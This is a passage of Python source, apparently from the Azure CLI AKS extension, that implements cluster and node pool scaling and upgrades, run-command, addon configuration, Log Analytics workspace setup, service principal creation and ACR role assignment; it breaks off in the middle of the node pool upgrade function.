instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance, custom_headers=headers)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise CLIError('Command cannot be empty.')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.run_command(
resource_group_name, name, request_payload, long_running_operation_timeout=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise CLIError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if cli_ctx.data['safe_params'] is None or "-o" in cli_ctx.data['safe_params'] or "--output" in cli_ctx.data['safe_params']:
# user specified output format, honor their choice, return object to render pipeline
return commandResult
else:
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, finished at {commandResult.finished_at}, with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise CLIError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise CLIError(f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons or 'azure-defender' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
if 'monitoring' in addons:
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
if 'azure-defender' in addons:
addon_profiles[CONST_AZURE_DEFENDER_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('azure-defender')
# error out if '--enable-addons=monitoring/azure-defender' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons [monitoring/azure-defender]".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
logger.error(
"AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.cli.core.profiles import ResourceType
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except HttpResponseError as ex:
if ex.status_code != 404:
raise ex
else:
ResourceGroup = cmd.get_models('ResourceGroup', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
resource_group = ResourceGroup(location=workspace_region)
resource_groups.create_or_update(default_workspace_resource_group, resource_group)
GenericResource = cmd.get_models('GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _sanitize_loganalytics_ws_resource_id(workspace_resource_id):
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
return workspace_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip(
)
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except HttpResponseError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
